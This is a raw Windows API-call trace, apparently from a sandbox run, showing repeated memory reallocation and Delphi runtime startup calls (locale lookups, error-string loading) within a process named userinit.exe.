[0138.764] GlobalHandle (pMem=0x1670020) returned 0x33000c
[0138.764] GlobalUnlock (hMem=0x33000c) returned 0
[0138.764] GlobalReAlloc (hMem=0x33000c, dwBytes=0xa4000, uFlags=0x2) returned 0x33000c
[0138.777] GlobalLock (hMem=0x33000c) returned 0x2790020
[0138.778] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0138.778] GlobalUnlock (hMem=0x33000c) returned 0
[0138.778] GlobalReAlloc (hMem=0x33000c, dwBytes=0xa6000, uFlags=0x2) returned 0x33000c
[0138.800] GlobalLock (hMem=0x33000c) returned 0x1670020
[0138.801] GlobalHandle (pMem=0x1670020) returned 0x33000c
[0138.801] GlobalUnlock (hMem=0x33000c) returned 0
[0138.801] GlobalReAlloc (hMem=0x33000c, dwBytes=0xa8000, uFlags=0x2) returned 0x33000c
[0138.893] GlobalLock (hMem=0x33000c) returned 0x2790020
[0138.894] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0138.894] GlobalUnlock (hMem=0x33000c) returned 0
[0138.894] GlobalReAlloc (hMem=0x33000c, dwBytes=0xaa000, uFlags=0x2) returned 0x33000c
[0138.908] GlobalLock (hMem=0x33000c) returned 0x1670020
[0138.909] GlobalHandle (pMem=0x1670020) returned 0x33000c
[0138.909] GlobalUnlock (hMem=0x33000c) returned 0
[0138.909] GlobalReAlloc (hMem=0x33000c, dwBytes=0xac000, uFlags=0x2) returned 0x33000c
[0138.924] GlobalLock (hMem=0x33000c) returned 0x2790020
[0138.924] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0138.924] GlobalUnlock (hMem=0x33000c) returned 0
[0138.924] GlobalReAlloc (hMem=0x33000c, dwBytes=0xae000, uFlags=0x2) returned 0x33000c
[0138.987] GlobalLock (hMem=0x33000c) returned 0x1670020
[0138.988] GlobalHandle (pMem=0x1670020) returned 0x33000c
[0138.988] GlobalUnlock (hMem=0x33000c) returned 0
[0138.988] GlobalReAlloc (hMem=0x33000c, dwBytes=0xb0000, uFlags=0x2) returned 0x33000c
[0139.013] GlobalLock (hMem=0x33000c) returned 0x2790020
[0139.014] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0139.014] GlobalUnlock (hMem=0x33000c) returned 0
[0139.014] GlobalReAlloc (hMem=0x33000c, dwBytes=0xb2000, uFlags=0x2) returned 0x33000c
[0139.064] GlobalLock (hMem=0x33000c) returned 0x2850020
[0139.065] GlobalHandle (pMem=0x2850020) returned 0x33000c
[0139.065] GlobalUnlock (hMem=0x33000c) returned 0
[0139.065] GlobalReAlloc (hMem=0x33000c, dwBytes=0xb4000, uFlags=0x2) returned 0x33000c
[0139.080] GlobalLock (hMem=0x33000c) returned 0x2790020
[0139.081] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0139.081] GlobalUnlock (hMem=0x33000c) returned 0
[0139.081] GlobalReAlloc (hMem=0x33000c, dwBytes=0xb6000, uFlags=0x2) returned 0x33000c
[0139.096] GlobalLock (hMem=0x33000c) returned 0x2850020
[0139.097] GlobalHandle (pMem=0x2850020) returned 0x33000c
[0139.097] GlobalUnlock (hMem=0x33000c) returned 0
[0139.097] GlobalReAlloc (hMem=0x33000c, dwBytes=0xb8000, uFlags=0x2) returned 0x33000c
[0139.160] GlobalLock (hMem=0x33000c) returned 0x2790020
[0139.161] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0139.161] GlobalUnlock (hMem=0x33000c) returned 0
[0139.161] GlobalReAlloc (hMem=0x33000c, dwBytes=0xba000, uFlags=0x2) returned 0x33000c
[0139.177] GlobalLock (hMem=0x33000c) returned 0x2850020
[0139.177] GlobalHandle (pMem=0x2850020) returned 0x33000c
[0139.177] GlobalUnlock (hMem=0x33000c) returned 0
[0139.177] GlobalReAlloc (hMem=0x33000c, dwBytes=0xbc000, uFlags=0x2) returned 0x33000c
[0139.240] GlobalLock (hMem=0x33000c) returned 0x2790020
[0139.241] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0139.241] GlobalUnlock (hMem=0x33000c) returned 0
[0139.241] GlobalReAlloc (hMem=0x33000c, dwBytes=0xbe000, uFlags=0x2) returned 0x33000c
[0139.260] GlobalLock (hMem=0x33000c) returned 0x2850020
[0139.261] GlobalHandle (pMem=0x2850020) returned 0x33000c
[0139.261] GlobalUnlock (hMem=0x33000c) returned 0
[0139.261] GlobalReAlloc (hMem=0x33000c, dwBytes=0xc0000, uFlags=0x2) returned 0x33000c
[0139.281] GlobalLock (hMem=0x33000c) returned 0x2910020
[0139.282] GlobalHandle (pMem=0x2910020) returned 0x33000c
[0139.282] GlobalUnlock (hMem=0x33000c) returned 0
[0139.282] GlobalReAlloc (hMem=0x33000c, dwBytes=0xc2000, uFlags=0x2) returned 0x33000c
[0139.350] GlobalLock (hMem=0x33000c) returned 0x2790020
[0139.351] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0139.351] GlobalUnlock (hMem=0x33000c) returned 0
[0139.351] GlobalReAlloc (hMem=0x33000c, dwBytes=0xc4000, uFlags=0x2) returned 0x33000c
[0139.371] GlobalLock (hMem=0x33000c) returned 0x2860020
[0139.372] GlobalHandle (pMem=0x2860020) returned 0x33000c
[0139.372] GlobalUnlock (hMem=0x33000c) returned 0
[0139.372] GlobalReAlloc (hMem=0x33000c, dwBytes=0xc6000, uFlags=0x2) returned 0x33000c
[0139.439] GlobalLock (hMem=0x33000c) returned 0x2790020
[0139.440] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0139.440] GlobalUnlock (hMem=0x33000c) returned 0
[0139.440] GlobalReAlloc (hMem=0x33000c, dwBytes=0xc8000, uFlags=0x2) returned 0x33000c
[0139.460] GlobalLock (hMem=0x33000c) returned 0x2860020
[0139.461] GlobalHandle (pMem=0x2860020) returned 0x33000c
[0139.461] GlobalUnlock (hMem=0x33000c) returned 0
[0139.461] GlobalReAlloc (hMem=0x33000c, dwBytes=0xca000, uFlags=0x2) returned 0x33000c
[0139.529] GlobalLock (hMem=0x33000c) returned 0x2790020
[0139.530] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0139.530] GlobalUnlock (hMem=0x33000c) returned 0
[0139.530] GlobalReAlloc (hMem=0x33000c, dwBytes=0xcc000, uFlags=0x2) returned 0x33000c
[0139.550] GlobalLock (hMem=0x33000c) returned 0x2860020
[0139.551] GlobalHandle (pMem=0x2860020) returned 0x33000c
[0139.551] GlobalUnlock (hMem=0x33000c) returned 0
[0139.551] GlobalReAlloc (hMem=0x33000c, dwBytes=0xce000, uFlags=0x2) returned 0x33000c
[0139.619] GlobalLock (hMem=0x33000c) returned 0x2790020
[0139.620] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0139.620] GlobalUnlock (hMem=0x33000c) returned 0
[0139.620] GlobalReAlloc (hMem=0x33000c, dwBytes=0xd0000, uFlags=0x2) returned 0x33000c
[0139.640] GlobalLock (hMem=0x33000c) returned 0x2860020
[0139.641] GlobalHandle (pMem=0x2860020) returned 0x33000c
[0139.641] GlobalUnlock (hMem=0x33000c) returned 0
[0139.641] GlobalReAlloc (hMem=0x33000c, dwBytes=0xd2000, uFlags=0x2) returned 0x33000c
[0139.708] GlobalLock (hMem=0x33000c) returned 0x2940020
[0139.709] GlobalHandle (pMem=0x2940020) returned 0x33000c
[0139.709] GlobalUnlock (hMem=0x33000c) returned 0
[0139.709] GlobalReAlloc (hMem=0x33000c, dwBytes=0xd4000, uFlags=0x2) returned 0x33000c
[0139.729] GlobalLock (hMem=0x33000c) returned 0x2790020
[0139.730] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0139.730] GlobalUnlock (hMem=0x33000c) returned 0
[0139.730] GlobalReAlloc (hMem=0x33000c, dwBytes=0xd6000, uFlags=0x2) returned 0x33000c
[0139.781] GlobalLock (hMem=0x33000c) returned 0x2870020
[0139.781] GlobalHandle (pMem=0x2870020) returned 0x33000c
[0139.781] GlobalUnlock (hMem=0x33000c) returned 0
[0139.782] GlobalReAlloc (hMem=0x33000c, dwBytes=0xd8000, uFlags=0x2) returned 0x33000c
[0139.800] GlobalLock (hMem=0x33000c) returned 0x2790020
[0139.801] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0139.801] GlobalUnlock (hMem=0x33000c) returned 0
[0139.801] GlobalReAlloc (hMem=0x33000c, dwBytes=0xda000, uFlags=0x2) returned 0x33000c
[0139.867] GlobalLock (hMem=0x33000c) returned 0x2870020
[0139.868] GlobalHandle (pMem=0x2870020) returned 0x33000c
[0139.868] GlobalUnlock (hMem=0x33000c) returned 0
[0139.868] GlobalReAlloc (hMem=0x33000c, dwBytes=0xdc000, uFlags=0x2) returned 0x33000c
[0139.890] GlobalLock (hMem=0x33000c) returned 0x2790020
[0139.891] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0139.891] GlobalUnlock (hMem=0x33000c) returned 0
[0139.891] GlobalReAlloc (hMem=0x33000c, dwBytes=0xde000, uFlags=0x2) returned 0x33000c
[0139.960] GlobalLock (hMem=0x33000c) returned 0x2870020
[0139.961] GlobalHandle (pMem=0x2870020) returned 0x33000c
[0139.961] GlobalUnlock (hMem=0x33000c) returned 0
[0139.961] GlobalReAlloc (hMem=0x33000c, dwBytes=0xe0000, uFlags=0x2) returned 0x33000c
[0139.981] GlobalLock (hMem=0x33000c) returned 0x2950020
[0139.981] GlobalHandle (pMem=0x2950020) returned 0x33000c
[0139.981] GlobalUnlock (hMem=0x33000c) returned 0
[0139.981] GlobalReAlloc (hMem=0x33000c, dwBytes=0xe2000, uFlags=0x2) returned 0x33000c
[0140.055] GlobalLock (hMem=0x33000c) returned 0x2790020
[0140.055] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0140.055] GlobalUnlock (hMem=0x33000c) returned 0
[0140.055] GlobalReAlloc (hMem=0x33000c, dwBytes=0xe4000, uFlags=0x2) returned 0x33000c
[0140.074] GlobalLock (hMem=0x33000c) returned 0x2880020
[0140.075] GlobalHandle (pMem=0x2880020) returned 0x33000c
[0140.075] GlobalUnlock (hMem=0x33000c) returned 0
[0140.075] GlobalReAlloc (hMem=0x33000c, dwBytes=0xe6000, uFlags=0x2) returned 0x33000c
[0140.094] GlobalLock (hMem=0x33000c) returned 0x2790020
[0140.095] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0140.095] GlobalUnlock (hMem=0x33000c) returned 0
[0140.095] GlobalReAlloc (hMem=0x33000c, dwBytes=0xe8000, uFlags=0x2) returned 0x33000c
[0140.160] GlobalLock (hMem=0x33000c) returned 0x2880020
[0140.161] GlobalHandle (pMem=0x2880020) returned 0x33000c
[0140.161] GlobalUnlock (hMem=0x33000c) returned 0
[0140.161] GlobalReAlloc (hMem=0x33000c, dwBytes=0xea000, uFlags=0x2) returned 0x33000c
[0140.180] GlobalLock (hMem=0x33000c) returned 0x2790020
[0140.180] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0140.180] GlobalUnlock (hMem=0x33000c) returned 0
[0140.180] GlobalReAlloc (hMem=0x33000c, dwBytes=0xec000, uFlags=0x2) returned 0x33000c
[0140.247] GlobalLock (hMem=0x33000c) returned 0x2880020
[0140.248] GlobalHandle (pMem=0x2880020) returned 0x33000c
[0140.248] GlobalUnlock (hMem=0x33000c) returned 0
[0140.248] GlobalReAlloc (hMem=0x33000c, dwBytes=0xee000, uFlags=0x2) returned 0x33000c
[0140.268] GlobalLock (hMem=0x33000c) returned 0x2790020
[0140.269] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0140.269] GlobalUnlock (hMem=0x33000c) returned 0
[0140.269] GlobalReAlloc (hMem=0x33000c, dwBytes=0xf0000, uFlags=0x2) returned 0x33000c
[0140.306] GlobalLock (hMem=0x33000c) returned 0x2880020
[0140.307] GlobalHandle (pMem=0x2880020) returned 0x33000c
[0140.307] GlobalUnlock (hMem=0x33000c) returned 0
[0140.307] GlobalReAlloc (hMem=0x33000c, dwBytes=0xf2000, uFlags=0x2) returned 0x33000c
[0140.326] GlobalLock (hMem=0x33000c) returned 0x2980020
[0140.327] GlobalHandle (pMem=0x2980020) returned 0x33000c
[0140.327] GlobalUnlock (hMem=0x33000c) returned 0
[0140.327] GlobalReAlloc (hMem=0x33000c, dwBytes=0xf4000, uFlags=0x2) returned 0x33000c
[0140.381] GlobalLock (hMem=0x33000c) returned 0x2790020
[0140.382] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0140.382] GlobalUnlock (hMem=0x33000c) returned 0
[0140.382] GlobalReAlloc (hMem=0x33000c, dwBytes=0xf6000, uFlags=0x2) returned 0x33000c
[0140.402] GlobalLock (hMem=0x33000c) returned 0x2890020
[0140.403] GlobalHandle (pMem=0x2890020) returned 0x33000c
[0140.403] GlobalUnlock (hMem=0x33000c) returned 0
[0140.403] GlobalReAlloc (hMem=0x33000c, dwBytes=0xf8000, uFlags=0x2) returned 0x33000c
[0140.462] GlobalLock (hMem=0x33000c) returned 0x2790020
[0140.463] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0140.463] GlobalUnlock (hMem=0x33000c) returned 0
[0140.463] GlobalReAlloc (hMem=0x33000c, dwBytes=0xfa000, uFlags=0x2) returned 0x33000c
[0140.483] GlobalLock (hMem=0x33000c) returned 0x2890020
[0140.484] GlobalHandle (pMem=0x2890020) returned 0x33000c
[0140.484] GlobalUnlock (hMem=0x33000c) returned 0
[0140.484] GlobalReAlloc (hMem=0x33000c, dwBytes=0xfc000, uFlags=0x2) returned 0x33000c
[0140.538] GlobalLock (hMem=0x33000c) returned 0x2790020
[0140.539] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0140.539] GlobalUnlock (hMem=0x33000c) returned 0
[0140.539] GlobalReAlloc (hMem=0x33000c, dwBytes=0xfe000, uFlags=0x2) returned 0x33000c
[0140.559] GlobalLock (hMem=0x33000c) returned 0x2890020
[0140.560] GlobalHandle (pMem=0x2890020) returned 0x33000c
[0140.560] GlobalUnlock (hMem=0x33000c) returned 0
[0140.560] GlobalReAlloc (hMem=0x33000c, dwBytes=0x100000, uFlags=0x2) returned 0x33000c
[0140.582] GlobalLock (hMem=0x33000c) returned 0x2990020
[0140.583] GlobalHandle (pMem=0x2990020) returned 0x33000c
[0140.583] GlobalUnlock (hMem=0x33000c) returned 0
[0140.583] GlobalReAlloc (hMem=0x33000c, dwBytes=0x102000, uFlags=0x2) returned 0x33000c
[0140.609] GlobalLock (hMem=0x33000c) returned 0x2790020
[0140.610] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0140.610] GlobalUnlock (hMem=0x33000c) returned 0
[0140.610] GlobalReAlloc (hMem=0x33000c, dwBytes=0x104000, uFlags=0x2) returned 0x33000c
[0140.653] GlobalLock (hMem=0x33000c) returned 0x28a0020
[0140.654] GlobalHandle (pMem=0x28a0020) returned 0x33000c
[0140.654] GlobalUnlock (hMem=0x33000c) returned 0
[0140.654] GlobalReAlloc (hMem=0x33000c, dwBytes=0x106000, uFlags=0x2) returned 0x33000c
[0140.681] GlobalLock (hMem=0x33000c) returned 0x2790020
[0140.682] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0140.682] GlobalUnlock (hMem=0x33000c) returned 0
[0140.682] GlobalReAlloc (hMem=0x33000c, dwBytes=0x108000, uFlags=0x2) returned 0x33000c
[0140.704] GlobalLock (hMem=0x33000c) returned 0x28a0020
[0140.706] GlobalHandle (pMem=0x28a0020) returned 0x33000c
[0140.706] GlobalUnlock (hMem=0x33000c) returned 0
[0140.706] GlobalReAlloc (hMem=0x33000c, dwBytes=0x10a000, uFlags=0x2) returned 0x33000c
[0140.727] GlobalLock (hMem=0x33000c) returned 0x2790020
[0140.728] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0140.728] GlobalUnlock (hMem=0x33000c) returned 0
[0140.728] GlobalReAlloc (hMem=0x33000c, dwBytes=0x10c000, uFlags=0x2) returned 0x33000c
[0140.750] GlobalLock (hMem=0x33000c) returned 0x28a0020
[0140.751] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x2790000
[0140.751] VirtualAlloc (lpAddress=0x2790000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x2790000
[0140.790] GetKeyboardType (nTypeFlag=0) returned 4
[0140.790] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0140.790] GetStartupInfoA (in: lpStartupInfo=0xef360 | out: lpStartupInfo=0xef360*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0140.790] GetVersion () returned 0x1db10106
[0140.790] GetVersion () returned 0x1db10106
[0140.790] GetCurrentThreadId () returned 0x8a0
[0140.790] GetModuleFileNameA (in: hModule=0x29b0000, lpFilename=0xeee5c, nSize=0x105 | out: lpFilename="lî\x0e" (normalized: "c:\\windows\\system32\\lî\x0e")) returned 0x0
[0140.790] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xeed37, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.790] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xeee4c | out: phkResult=0xeee4c*=0x0) returned 0x2
[0140.790] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xeee4c | out: phkResult=0xeee4c*=0x0) returned 0x2
[0140.790] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xeee4c | out: phkResult=0xeee4c*=0x0) returned 0x2
[0140.790] lstrcpynA (in: lpString1=0xeed37, lpString2="lî\x0e", iMaxLength=261 | out: lpString1="lî\x0e") returned="lî\x0e"
[0140.790] GetThreadLocale () returned 0x409
[0140.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0xeee47, cchData=5 | out: lpLCData="ENU") returned 4
[0140.790] lstrlenA (lpString="lî\x0e") returned 3
[0140.790] LoadStringA (in: hInstance=0x29b0000, uID=0xffc4, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0140.790] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x5edcc0
[0140.790] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2ad0000
[0140.790] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x5eecc0
[0140.791] VirtualAlloc (lpAddress=0x2ad0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2ad0000
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xffc3, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xffc1, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xffc2, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xffd4, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xffdd, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xffd3, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xffd0, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xffd7, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xffd6, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xffe8, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xffe9, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xffea, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xffe7, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xffe5, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xffe3, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xffe2, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xffe1, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xffe0, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xffff, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xfffe, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xfffd, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xfffc, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xfffb, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xfffa, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xfff9, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xfff8, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xfff7, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xfff6, lpBuffer=0xeef80, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0140.791] LoadStringA (in: hInstance=0x29b0000, uID=0xfff4, lpBuffer=0xeef6c, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0140.792] LoadStringA (in: hInstance=0x29b0000, uID=0xffe4, lpBuffer=0xeef6c, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0140.792] GetVersionExA (in: lpVersionInformation=0xef304*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x29b0000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<\x9b\x02·\"\x9b\x02\x9có\x0e") | out: lpVersionInformation=0xef304*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0140.792] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.792] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0140.792] GetThreadLocale () returned 0x409
[0140.792] GetThreadLocale () returned 0x409
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Jan") returned 4
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0xef1dc, cchData=256 | out: lpLCData="January") returned 8
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Feb") returned 4
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0xef1dc, cchData=256 | out: lpLCData="February") returned 9
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Mar") returned 4
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0xef1dc, cchData=256 | out: lpLCData="March") returned 6
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Apr") returned 4
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0xef1dc, cchData=256 | out: lpLCData="April") returned 6
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0xef1dc, cchData=256 | out: lpLCData="May") returned 4
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0xef1dc, cchData=256 | out: lpLCData="May") returned 4
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Jun") returned 4
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0xef1dc, cchData=256 | out: lpLCData="June") returned 5
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Jul") returned 4
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0xef1dc, cchData=256 | out: lpLCData="July") returned 5
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Aug") returned 4
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0xef1dc, cchData=256 | out: lpLCData="August") returned 7
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Sep") returned 4
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0xef1dc, cchData=256 | out: lpLCData="September") returned 10
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Oct") returned 4
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0xef1dc, cchData=256 | out: lpLCData="October") returned 8
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Nov") returned 4
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0xef1dc, cchData=256 | out: lpLCData="November") returned 9
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Dec") returned 4
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0xef1dc, cchData=256 | out: lpLCData="December") returned 9
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Sun") returned 4
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Sunday") returned 7
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Mon") returned 4
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Monday") returned 7
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Tue") returned 4
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Tuesday") returned 8
[0140.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Wed") returned 4
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Wednesday") returned 10
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Thu") returned 4
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Thursday") returned 9
